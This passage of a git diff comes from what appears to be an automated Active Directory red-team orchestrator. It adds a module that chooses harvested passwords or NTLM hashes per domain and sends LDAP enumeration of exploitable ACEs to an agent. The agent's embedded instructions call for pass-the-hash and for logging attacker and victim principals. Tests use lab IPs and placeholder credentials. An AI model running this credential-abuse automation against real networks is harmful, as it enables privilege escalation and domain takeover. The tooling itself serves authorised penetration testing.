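// prefix, exactly 11 ASCII alphanumerics, optional trailing '$'.
fn is_ghost_machine_account(username: &str) -> bool {
    let u = username.trim();
    let u = u.strip_suffix('$').unwrap_or(u);
    let upper = u.to_ascii_uppercase();
    match upper.strip_prefix("WIN-") {
        Some(rest) => rest.len() == 11 && rest.chars().all(|c| c.is_ascii_alphanumeric()),
        None => false,
    }
}
```

Uppercasing before the check reproduces the `(?i)` flag, and the fixed length of 11 is what rejects legitimately short machine accounts like `WIN-2019$`.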
pub(super) const NOISE_USERNAMES: &[&str] = &[ @@ -81,6 +81,7 @@ pub(crate) fn dedup_users(users: &[User], netbios_to_fqdn: &HashMap, exploited: &HashSet, @@ -303,20 +308,57 @@ fn print_vulnerabilities( return; } - let mut vulns: Vec<(&String, &VulnerabilityInfo)> = discovered.iter().collect(); - vulns.sort_by(|a, b| { - a.1.priority - .cmp(&b.1.priority) - .then(a.1.vuln_type.cmp(&b.1.vuln_type)) - }); + let mut exploitable: Vec<(&String, &VulnerabilityInfo)> = Vec::new(); + let mut findings: Vec<(&String, &VulnerabilityInfo)> = Vec::new(); + for (id, vuln) in discovered.iter() { + if vuln.priority <= EXPLOITABLE_PRIORITY_MAX { + exploitable.push((id, vuln)); + } else { + findings.push((id, vuln)); + } + } + let sort_vulns = |vulns: &mut Vec<(&String, &VulnerabilityInfo)>| { + vulns.sort_by(|a, b| { + a.1.priority + .cmp(&b.1.priority) + .then(a.1.vuln_type.cmp(&b.1.vuln_type)) + }); + }; + sort_vulns(&mut exploitable); + sort_vulns(&mut findings); + + let exploited_in_exploitable = exploitable + .iter() + .filter(|(id, _)| exploited.contains(*id)) + .count(); - println!("Discovered Vulnerabilities ({}):", vulns.len()); + println!( + "Exploitable Vulnerabilities ({}, {} exploited):", + exploitable.len(), + exploited_in_exploitable + ); + if exploitable.is_empty() { + println!(" (none)"); + } else { + print_vuln_table(&exploitable, exploited); + } + println!(); + + println!("Findings ({}):", findings.len()); + if !findings.is_empty() { + print_vuln_table(&findings, exploited); + } + println!(); +} + +/// Render a single vulnerability table body (header + rows). 
+fn print_vuln_table(vulns: &[(&String, &VulnerabilityInfo)], exploited: &HashSet) { println!( " {:<30} {:<20} {:>8} {:>9} Details", "Type", "Target", "Priority", "Exploited" ); println!(" {}", "-".repeat(100)); - for (vuln_id, vuln) in &vulns { + for (vuln_id, vuln) in vulns { let is_exploited = exploited.contains(*vuln_id); let exploited_mark = if is_exploited { "\u{2713}" } else { "\u{2717}" }; @@ -336,7 +378,6 @@ fn print_vulnerabilities( vuln.vuln_type, vuln.target, vuln.priority, exploited_mark, details_display ); } - println!(); } /// Format vulnerability details HashMap into a readable string. @@ -422,10 +463,12 @@ fn print_attack_path(timeline_events: &[serde_json::Value]) { .and_then(|v| v.as_str()) .unwrap_or("unknown event"); + let already_critical = description.starts_with("CRITICAL:"); let desc_lower = description.to_lowercase(); - let is_critical = desc_lower.contains("krbtgt") - || (desc_lower.contains("administrator") && desc_lower.contains("hash")) - || desc_lower.contains("domain admin"); + let is_critical = !already_critical + && (desc_lower.contains("krbtgt") + || (desc_lower.contains("administrator") && desc_lower.contains("hash")) + || desc_lower.contains("domain admin")); let prefix = if is_critical { "CRITICAL: " } else { "" }; let mitre = extract_mitre_from_event(event); diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs index 6571c836..97d8b6eb 100644 --- a/ares-cli/src/orchestrator/automation/acl.rs +++ b/ares-cli/src/orchestrator/automation/acl.rs @@ -174,6 +174,8 @@ mod tests { use super::*; use serde_json::json; + // --- extract_chain_steps --- + #[test] fn extract_chain_steps_from_array() { let chain = json!([{"source": "a"}, {"source": "b"}]); @@ -213,6 +215,8 @@ mod tests { assert!(extract_chain_steps(&chain).is_none()); } + // --- extract_source_user --- + #[test] fn extract_source_user_from_source_key() { let step = json!({"source": "admin"}); @@ -249,6 +253,8 @@ mod tests { 
assert_eq!(extract_source_user(&step), ""); } + // --- extract_source_domain --- + #[test] fn extract_source_domain_from_source_domain_key() { let step = json!({"source_domain": "contoso.local"}); @@ -279,6 +285,8 @@ mod tests { assert_eq!(extract_source_domain(&step), ""); } + // --- acl_step_dedup_key --- + #[test] fn acl_step_dedup_key_basic() { assert_eq!(acl_step_dedup_key(0, 0), "chain:0:step:0"); diff --git a/ares-cli/src/orchestrator/automation/acl_discovery.rs b/ares-cli/src/orchestrator/automation/acl_discovery.rs new file mode 100644 index 00000000..7a75814c --- /dev/null +++ b/ares-cli/src/orchestrator/automation/acl_discovery.rs @@ -0,0 +1,812 @@ +//! auto_acl_discovery -- discover ACL attack paths via targeted LDAP queries. +//! +//! Bridges the gap between BloodHound collection and ACL exploitation. +//! BloodHound collects data, but the ACL chain analysis must be extracted +//! and registered as discovered_vulnerabilities for `auto_dacl_abuse` to +//! exploit. +//! +//! This module dispatches `ldap_acl_enumeration` tasks per domain to: +//! 1. Query nTSecurityDescriptor on user/group/computer objects +//! 2. Identify dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, +//! GenericWrite, WriteOwner, Self-Membership) +//! 3. Register discovered ACL paths as vulnerabilities +//! +//! Interval: 60s (heavy LDAP query, don't run too frequently). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// The dangerous ACE types we want the recon agent to identify. +const DANGEROUS_ACE_TYPES: &[&str] = &[ + "GenericAll", + "GenericWrite", + "WriteDacl", + "WriteOwner", + "ForceChangePassword", + "Self-Membership", + "WriteMember", + "AllExtendedRights", + "WriteProperty", +]; + +/// Collect ACL discovery work items from current state. 
+/// +/// Pure logic extracted from `auto_acl_discovery` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_acl_discovery_work(state: &StateInner) -> Vec<AclDiscoveryWork> { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for (domain, dc_ip) in &state.all_domains_with_dcs() { + // Skip dominated domains — once we own a domain there is nothing left + // for ACL escalation to discover there. Cross-trust ACL paths against + // un-owned domains still fire (they iterate other entries in + // all_domains_with_dcs). + if state.dominated_domains.contains(domain) { + continue; + } + // Use separate dedup keys for cred vs hash attempts so a failed + // password-based attempt (e.g., mislabeled credential domain) + // doesn't permanently block the hash-based path. + let dedup_key_cred = format!("acl_disc:{}:cred", domain.to_lowercase()); + let dedup_key_hash = format!("acl_disc:{}:hash", domain.to_lowercase()); + let dedup_key_trust = format!("acl_disc:{}:trust", domain.to_lowercase()); + + // Prefer same-domain cleartext cred, then fall back to trust-compatible + // cred (child→parent or cross-forest). Trust-based attempts use a + // separate dedup key so they don't block hash-based fallback.
+ let (cred, using_trust_cred) = if !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_cred) + { + let c = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + (c, false) + } else { + (None, false) + }; + let (cred, using_trust_cred) = + if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_trust) { + match state.find_trust_credential(domain) { + Some(c) => (Some(c), true), + None => (None, using_trust_cred), + } + } else { + (cred, using_trust_cred) + }; + + // Look for NTLM hash (PTH) — fires independently of cred attempt + let (ntlm_hash, ntlm_hash_username) = + if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_hash) { + state + .hashes + .iter() + .find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && h.username.to_lowercase() == "administrator" + }) + .or_else(|| { + state.hashes.iter().find(|h| { + h.hash_type.to_lowercase() == "ntlm" + && h.domain.to_lowercase() == domain.to_lowercase() + && !state.is_delegation_account(&h.username) + }) + }) + .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone()))) + .unwrap_or((None, None)) + } else { + (None, None) + }; + + // Need at least a credential or an NTLM hash + if cred.is_none() && ntlm_hash.is_none() { + continue; + } + + let dedup_key = if ntlm_hash.is_some() { + dedup_key_hash + } else if using_trust_cred { + dedup_key_trust + } else { + dedup_key_cred + }; + + // Collect known users in this domain to check ACEs against. 
+ let domain_users: Vec<String> = state + .credentials + .iter() + .filter(|c| c.domain.to_lowercase() == domain.to_lowercase()) + .map(|c| c.username.clone()) + .collect(); + + items.push(AclDiscoveryWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred.unwrap_or_else(|| ares_core::models::Credential { + id: String::new(), + username: ntlm_hash_username.clone().unwrap_or_default(), + password: String::new(), + domain: domain.clone(), + source: "hash_fallback".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }), + known_users: domain_users, + ntlm_hash, + ntlm_hash_username, + }); + } + + items +} + +/// Dispatches LDAP ACE enumeration per domain to discover ACL attack paths. +/// Only runs after BloodHound collection has been dispatched (to avoid +/// duplicating effort). +pub async fn auto_acl_discovery(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + info!("auto_acl_discovery: spawned, waiting 45s for initial recon"); + + // Wait for initial recon to populate domain controllers. + tokio::time::sleep(Duration::from_secs(45)).await; + + info!("auto_acl_discovery: initial wait complete, entering main loop"); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("acl_discovery") { + debug!("auto_acl_discovery: technique not allowed"); + continue; + } + + let work: Vec<AclDiscoveryWork> = { + let state = dispatcher.state.read().await; + let dcs = state.all_domains_with_dcs(); + let creds = state.credentials.len(); + let hashes = state.hashes.len(); + info!( + dc_count = dcs.len(), + creds, hashes, "auto_acl_discovery: tick" + ); + collect_acl_discovery_work(&state) + }; + + if work.is_empty() { + debug!("auto_acl_discovery: no work items"); + } else { + info!( + count = work.len(), + "auto_acl_discovery: work items collected" + ); + } + + for item in work { + // When PTH hash is available, use the hash user's identity for the target domain + let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() { + ( + item.ntlm_hash_username + .clone() + .unwrap_or_else(|| item.credential.username.clone()), + String::new(), + item.domain.clone(), + ) + } else { + ( + item.credential.username.clone(), + item.credential.password.clone(), + item.credential.domain.clone(), + ) + }; + let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase(); + let mut payload = json!({ + "technique": "ldap_acl_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": cred_user, + "password": cred_pass, + "domain": cred_domain, + }, + "ace_types": DANGEROUS_ACE_TYPES, + "known_users": item.known_users, + "instructions": concat!( + "Enumerate ACL attack paths in this domain.\n\n", + "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ", + "you MUST use pass-the-hash.
Do NOT attempt LDAP simple bind with empty password.\n", + " - Use ldap_search with the hash if it accepts one, OR\n", + " - Use rpcclient_command with the hash parameter to query DACLs via RPC.\n\n", + "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain, ", + "you MUST pass bind_domain= to ldap_search. ", + "Check the 'bind_domain' field in the task payload — if present, always pass it ", + "to ldap_search so the LDAP bind uses user@bind_domain.\n\n", + "If a password IS provided, use ldap_search with filter ", + "'(objectCategory=*)' and request the nTSecurityDescriptor attribute.\n\n", + "For each dangerous ACE found (GenericAll, WriteDacl, ForceChangePassword, ", + "GenericWrite, WriteOwner, Self-Membership on users/groups), register it as ", + "a vulnerability with EXACTLY these fields:\n", + " vuln_type: lowercase ACE type (e.g. 'forcechangepassword', 'genericall', ", + "'genericwrite', 'writedacl', 'writeowner', 'self_membership')\n", + " source: the user/group that HAS the permission (attacker)\n", + " target: the user/group/computer that is the TARGET (victim)\n", + " target_type: 'User', 'Group', or 'Computer'\n", + " domain: the domain where this ACE exists\n", + " source_domain: the domain of the source principal\n", + "Focus on ACEs where the source is a user we have credentials for.\n\n", + "IMPORTANT: Include ALL users discovered in the discovered_users array:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"acl_discovery\"}" + ), + }); + if cross_domain { + payload["bind_domain"] = json!(item.credential.domain); + } + if let Some(ref hash) = item.ntlm_hash { + payload["ntlm_hash"] = json!(hash); + } + if let Some(ref user) = item.ntlm_hash_username { + payload["hash_username"] = json!(user); + } + + // ACL discovery is high-priority — it gates RBCD, shadow creds, + // and DACL abuse exploitation paths. 
Use priority 2 to compete + // with credential_access tasks rather than sitting behind them. + let priority = 2; + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + known_users = item.known_users.len(), + "ACL discovery dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_ACL_DISCOVERY, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_ACL_DISCOVERY, &item.dedup_key) + .await; + } + Ok(None) => { + // Don't mark dedup on defer — the deferred queue will + // retry and we need the work item to remain eligible in + // case the deferred task never dispatches. Duplicate + // enqueues to the deferred queue are harmless (it dedupes + // by payload hash). + debug!(domain = %item.domain, "ACL discovery deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch ACL discovery"); + } + } + } + } +} + +struct AclDiscoveryWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + known_users: Vec, + ntlm_hash: Option, + ntlm_hash_username: Option, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::Credential; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn dedup_key_format() { + let key_cred = format!("acl_disc:{}:cred", "contoso.local"); + let key_hash = format!("acl_disc:{}:hash", "contoso.local"); + assert_eq!(key_cred, "acl_disc:contoso.local:cred"); + assert_eq!(key_hash, 
"acl_disc:contoso.local:hash"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_ACL_DISCOVERY, "acl_discovery"); + } + + #[test] + fn dangerous_ace_types_not_empty() { + assert!(!DANGEROUS_ACE_TYPES.is_empty()); + } + + #[test] + fn dangerous_ace_types_contains_key_types() { + assert!(DANGEROUS_ACE_TYPES.contains(&"GenericAll")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteDacl")); + assert!(DANGEROUS_ACE_TYPES.contains(&"ForceChangePassword")); + assert!(DANGEROUS_ACE_TYPES.contains(&"GenericWrite")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteOwner")); + assert!(DANGEROUS_ACE_TYPES.contains(&"Self-Membership")); + } + + #[test] + fn dangerous_ace_types_count() { + assert_eq!(DANGEROUS_ACE_TYPES.len(), 9); + } + + #[test] + fn dangerous_ace_types_includes_write_property() { + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteProperty")); + assert!(DANGEROUS_ACE_TYPES.contains(&"AllExtendedRights")); + assert!(DANGEROUS_ACE_TYPES.contains(&"WriteMember")); + } + + #[test] + fn dangerous_ace_types_no_duplicates() { + let mut seen = std::collections::HashSet::new(); + for ace in DANGEROUS_ACE_TYPES { + assert!(seen.insert(*ace), "Duplicate ACE type: {ace}"); + } + } + + #[test] + fn dedup_key_case_normalized() { + let key1 = format!("acl_disc:{}", "CONTOSO.LOCAL".to_lowercase()); + let key2 = format!("acl_disc:{}", "contoso.local"); + assert_eq!(key1, key2); + } + + #[test] + fn acl_discovery_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_acl_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + "ace_types": DANGEROUS_ACE_TYPES, + "known_users": ["admin", "jdoe"], + }); + assert_eq!(payload["technique"], "ldap_acl_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + let ace_types = payload["ace_types"].as_array().unwrap(); + assert_eq!(ace_types.len(), 9); + } + + #[test] + fn 
credential_domain_preference() { + // Same-domain credential is preferred + let domain = "contoso.local"; + let cred_same = "contoso.local"; + let cred_other = "fabrikam.local"; + assert_eq!(cred_same.to_lowercase(), domain.to_lowercase()); + assert_ne!(cred_other.to_lowercase(), domain.to_lowercase()); + } + + #[test] + fn known_users_collection() { + let credentials = [ + ("admin", "contoso.local"), + ("jdoe", "contoso.local"), + ("admin", "fabrikam.local"), + ]; + let domain = "contoso.local"; + let domain_users: Vec<&str> = credentials + .iter() + .filter(|(_, d)| d.to_lowercase() == domain.to_lowercase()) + .map(|(u, _)| *u) + .collect(); + assert_eq!(domain_users.len(), 2); + assert!(domain_users.contains(&"admin")); + assert!(domain_users.contains(&"jdoe")); + } + + #[test] + fn acl_discovery_work_fields() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = AclDiscoveryWork { + dedup_key: "acl_disc:contoso.local:cred".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + known_users: vec!["admin".into(), "jdoe".into()], + ntlm_hash: None, + ntlm_hash_username: None, + }; + assert_eq!(work.known_users.len(), 2); + assert_eq!(work.domain, "contoso.local"); + } + + // --- collect_acl_discovery_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); 
+ } + + #[test] + fn collect_no_domain_controllers_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + assert!(work[0].known_users.contains(&"admin".to_string())); + } + + #[test] + fn collect_multiple_domains_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 2); + let domains: Vec<&str> = work.iter().map(|w| w.domain.as_str()).collect(); + assert!(domains.contains(&"contoso.local")); + assert!(domains.contains(&"fabrikam.local")); + } + + #[test] + fn collect_dedup_skips_already_processed_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + 
.insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed_but_keeps_unprocessed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:cred".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:hash".into()); + state.mark_processed(DEDUP_ACL_DISCOVERY, "acl_disc:contoso.local:trust".into()); + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Add cross-domain cred first, then same-domain cred + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + 
assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_cross_domain_cred_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only a fabrikam credential available for contoso DC — should NOT fall back + state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 0, "cross-domain cred should not produce work"); + } + + #[test] + fn collect_skips_empty_password_credentials() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Credential with empty password + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_empty_password_uses_next() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("nopw", "", "contoso.local")); + state + .credentials + .push(make_credential("haspw", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "haspw"); + } + + #[test] + fn collect_known_users_only_from_same_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("jdoe", "Pass!456", "contoso.local")); // pragma: allowlist secret + state + .credentials + 
.push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].known_users.len(), 2); + assert!(work[0].known_users.contains(&"admin".to_string())); + assert!(work[0].known_users.contains(&"jdoe".to_string())); + assert!(!work[0].known_users.contains(&"crossuser".to_string())); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred"); + } + + #[test] + fn collect_all_empty_password_creds_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "", "contoso.local")); + state + .credentials + .push(make_credential("user2", "", "fabrikam.local")); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_same_domain_skipped_without_hash() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state 
+ .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + // No same-domain cred (quarantined) and no hash → skip + let work = collect_acl_discovery_work(&state); + assert_eq!( + work.len(), + 0, + "quarantined same-domain cred should not fall back to cross-domain" + ); + } + + #[test] + fn collect_all_credentials_quarantined_skips_domain() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("user1", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("user2", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("user1", "contoso.local"); + state.quarantine_credential("user2", "fabrikam.local"); + let work = collect_acl_discovery_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_case_insensitive_domain_matching_for_creds() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "Contoso.Local")); // pragma: allowlist 
secret + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + // Should match via case-insensitive comparison + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "Contoso.Local"); + } + + #[test] + fn collect_known_users_includes_empty_password_users() { + // known_users collects ALL creds for the domain, even ones with empty passwords + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("nopw_user", "", "contoso.local")); + let work = collect_acl_discovery_work(&state); + assert_eq!(work.len(), 1); + // Both users should appear in known_users (useful for ACE checking) + assert_eq!(work[0].known_users.len(), 2); + assert!(work[0].known_users.contains(&"admin".to_string())); + assert!(work[0].known_users.contains(&"nopw_user".to_string())); + } +} diff --git a/ares-cli/src/orchestrator/automation/adcs.rs b/ares-cli/src/orchestrator/automation/adcs.rs index f46d6a06..da76ef19 100644 --- a/ares-cli/src/orchestrator/automation/adcs.rs +++ b/ares-cli/src/orchestrator/automation/adcs.rs @@ -17,6 +17,230 @@ fn extract_domain_from_fqdn(fqdn: &str) -> Option<String> { .map(|(_, d)| d.to_string()) } +/// Work item for ADCS enumeration. +struct AdcsWork { + host_ip: String, + /// Auth-and-identity dedup key + /// (e.g. `"192.168.58.10:cred:jdoe@contoso.local"` or `"…:hash:admin@…"`). + /// Including the credential identity prevents one wrong-domain attempt + /// from permanently locking a CA host against later, possibly-correct creds. + dedup_key: String, + dc_ip: Option<String>, + domain: String, + credential: ares_core::models::Credential, + /// NTLM hash for pass-the-hash authentication (when no cleartext cred available).
+ ntlm_hash: Option<String>, + ntlm_hash_username: Option<String>, +} + +/// Dedup key for a cred-based certipy_find attempt. +/// Format: `{host}:cred:{username}@{domain}` (lowercased identity). +pub(crate) fn dedup_key_cred(host: &str, cred: &ares_core::models::Credential) -> String { + format!( + "{}:cred:{}@{}", + host, + cred.username.to_lowercase(), + cred.domain.to_lowercase() + ) +} + +/// Dedup key for a hash-based certipy_find attempt. +/// Format: `{host}:hash:{username}@{domain}` (lowercased identity). +pub(crate) fn dedup_key_hash(host: &str, hash: &ares_core::models::Hash) -> String { + format!( + "{}:hash:{}@{}", + host, + hash.username.to_lowercase(), + hash.domain.to_lowercase() + ) +} + +/// Collect ADCS enumeration work items from current state. +/// +/// Pure logic extracted from `auto_adcs_enumeration` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. +fn collect_adcs_work(state: &StateInner) -> Vec<AdcsWork> { + if state.credentials.is_empty() && state.hashes.is_empty() { + return Vec::new(); + } + + state + .shares + .iter() + .filter(|s| s.name.to_lowercase() == "certenroll") + .filter_map(|s| { + let host_lower = s.host.to_lowercase(); + + let domain = state + .hosts + .iter() + .find(|h| h.ip == s.host || h.hostname.to_lowercase() == host_lower) + .and_then(|h| extract_domain_from_fqdn(&h.hostname)) + .and_then(|d| { + if state.domains.iter().any(|known| known.to_lowercase() == d) { + Some(d) + } else { + state + .domains + .iter() + .find(|known| d.ends_with(&format!(".{}", known.to_lowercase()))) + .or_else(|| { + state + .domains + 